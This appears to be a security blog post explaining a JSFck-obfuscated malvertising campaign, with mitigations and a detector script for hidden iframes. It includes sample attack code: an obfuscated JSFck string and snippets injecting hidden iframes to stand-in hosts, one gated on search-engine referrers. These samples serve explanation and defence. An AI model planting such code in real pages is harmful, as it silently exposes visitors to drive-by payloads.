JSFck Malware Campaign: Obfuscation and Redirection Tactics


Introduction

JSFck is an esoteric subset of JavaScript that uses only six characters ([, ], (, ), !, and +) to execute arbitrary code. Palo Alto Networks Unit 42 researchers uncovered a widespread campaign leveraging JSFck obfuscation to evade detection while injecting malicious iframes. The malware checks for search engine referrers before redirecting victims to malvertising or payload delivery sites.

Learning Objectives

  • Understand how JSFck obfuscation bypasses traditional detection methods.
  • Analyze the malware’s redirection mechanism via injected iframes.
  • Learn defensive techniques to detect and mitigate such attacks.

You Should Know

1. JSFck Obfuscation Basics

Example Snippet:

[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()

Step-by-Step Explanation:

  1. Purpose: The above snippet is a JSFck-encoded “Hello, World!” equivalent. Attackers use similar patterns to hide malicious logic.
  2. How It Works: JSFck exploits JavaScript’s type coercion to construct strings, functions, and payloads using minimal characters.
  3. Detection: Use tools like the Node.js `vm` module or browser developer tools to deobfuscate dynamically.

2. Detecting Search Engine Referrer Abuse

Example Snippet (Malware Check):

if (document.referrer.indexOf("google.com") > -1 || document.referrer.indexOf("bing.com") > -1) {
  document.body.innerHTML += "<iframe src='malware.site' style='display:none;'></iframe>";
}

Step-by-Step Mitigation:

  1. Monitor Referrers: Use WAF rules (e.g., Cloudflare or ModSecurity) to block suspicious referrer patterns.
  2. Content Security Policy (CSP):

Content-Security-Policy: frame-ancestors 'none'; default-src 'self'

     Note that frame-ancestors only governs who may embed your page in a frame; what stops the page itself from loading an injected iframe is frame-src, which here falls back to default-src 'self' and therefore rejects the off-site frame.
  3. Browser Extensions: Deploy NoScript or uMatrix to block unauthorized iframes.

3. Analyzing Malicious Iframe Injection

Example Snippet (Dynamic Iframe):

var iframe = document.createElement('iframe'); 
iframe.src = "https://malicious.site/exploit"; 
iframe.style.display = "none"; 
document.body.appendChild(iframe); 

Step-by-Step Analysis:

  1. Inspection: Use Chrome DevTools (Elements tab) to detect hidden iframes.
  2. Blocking: Configure AdBlock Plus or uBlock Origin to filter known malicious domains.
  3. Logging: Log iframe loads server-side via Nginx/Apache access logs.
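As an added example, not code from the article or from Unit 42, here is a client-side detector for the hidden, off-origin iframes that sections 2 and 3 describe; PAGE_ORIGIN and SAMPLE_FRAMES are constructed, and isSuspiciousFrame and watchInjectedFrames are names chosen here.

```javascript
// Added example, not from the article or Unit 42: flag iframes that are both
// hidden and off-origin, the shape of the injected
// <iframe src='malware.site' style='display:none;'> shown above.
// PAGE_ORIGIN and SAMPLE_FRAMES are constructed for illustration.
const PAGE_ORIGIN = 'https://example.com';
const SAMPLE_FRAMES = [
  { src: 'https://malicious.site/exploit', style: { display: 'none' } }, // hidden, off-origin
  { src: 'https://example.com/embed', style: { display: 'none' } },      // hidden, but same origin
  { src: 'https://video.example.net/embed/1', style: {}, width: '560', height: '315' }, // visible
];
// A width/height attribute of exactly zero hides the frame; "" just means unset.
const isZero = (v) => v !== undefined && v !== '' && parseFloat(v) === 0;
// frame.style reflects inline styles only, which is what the injected snippet
// uses; getComputedStyle would also catch stylesheet-driven hiding.
function isSuspiciousFrame(frame, pageOrigin) {
  let target;
  try {
    target = new URL(frame.src || '', pageOrigin); // relative src stays on-origin
  } catch {
    return false; // unparsable src loads nothing, so there is nothing to flag
  }
  const offOrigin = target.origin !== new URL(pageOrigin).origin;
  const style = frame.style || {};
  const hidden = style.display === 'none' || style.visibility === 'hidden' ||
    isZero(frame.width) || isZero(frame.height);
  return offOrigin && hidden;
}

// Browser wiring: the referrer-gated snippet injects its iframe after load, so
// watch DOM insertions as well as frames already present. Returns the observer.
function watchInjectedFrames(doc, onHit) {
  const origin = doc.location.origin;
  const scan = (node) => {
    const frames = node.nodeName === 'IFRAME' ? [node]
      : node.querySelectorAll ? [...node.querySelectorAll('iframe')] : [];
    for (const f of frames) if (isSuspiciousFrame(f, origin)) onHit(f);
  };
  const observer = new MutationObserver((records) => {
    for (const r of records) r.addedNodes.forEach(scan);
  });
  observer.observe(doc.documentElement, { childList: true, subtree: true });
  scan(doc.documentElement);
  return observer;
}

if (typeof document !== 'undefined') {
  watchInjectedFrames(document, (f) => console.warn('hidden off-origin iframe:', f.src));
}
```

Under Node the browser wiring is skipped and isSuspiciousFrame can be exercised on the constructed frame objects directly.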

4. Deobfuscating JSFck with Node.js

Command:

node -e "console.log(require('vm').runInNewContext('<obfuscated code>'))"

(replace `<obfuscated code>` with the JSFck string to evaluate)

Steps:

  1. Save the obfuscated code to a file (malware.js).
  2. Run:

node -e "console.log(require('vm').runInNewContext(require('fs').readFileSync('malware.js', 'utf8')))"

  3. Output: Decoded JavaScript logic. Note that runInNewContext evaluates the sample rather than merely decoding it, and Node's vm module is not a security boundary, so do this only inside a disposable analysis VM.

5. Preventing JSFck Execution

Mitigation Techniques:

  1. CSP Header:

Content-Security-Policy: script-src 'self'

     Do not add 'unsafe-inline' or 'unsafe-eval' to this directive: 'unsafe-inline' would let an injected inline script run at all, and 'unsafe-eval' is precisely what permits the Function-constructor call that JSFck builds from []["filter"]["constructor"].
  2. WAF Rules: Block scripts with excessive `[`, `(`, `!`, or `+` characters.
  3. Static Analysis: Use ESLint with custom rules to flag JSFck patterns.

What Undercode Say

  • Key Takeaway 1: JSFck’s minimalistic obfuscation makes it a potent evasion tool, but dynamic analysis defeats it.
  • Key Takeaway 2: Referrer-based attacks exploit trust in search engines—implement CSP and WAF rules to disrupt the kill chain.

Analysis:

The campaign highlights attackers’ shift toward “low-character” obfuscation to bypass regex-based detection. Future variants may combine JSFck with WebAssembly (WASM) for further stealth. Defenders must prioritize runtime analysis over static signatures and adopt zero-trust policies for third-party scripts.

Prediction

JSFck’s abuse will grow as attackers target SMBs with limited security tooling. Automated deobfuscation tools and AI-driven anomaly detection (e.g., Darktrace) will become critical to counter these threats.

Reference: Palo Alto Networks Unit 42 Report

Reported By: Unit42 Esoteric – Hackers Feeds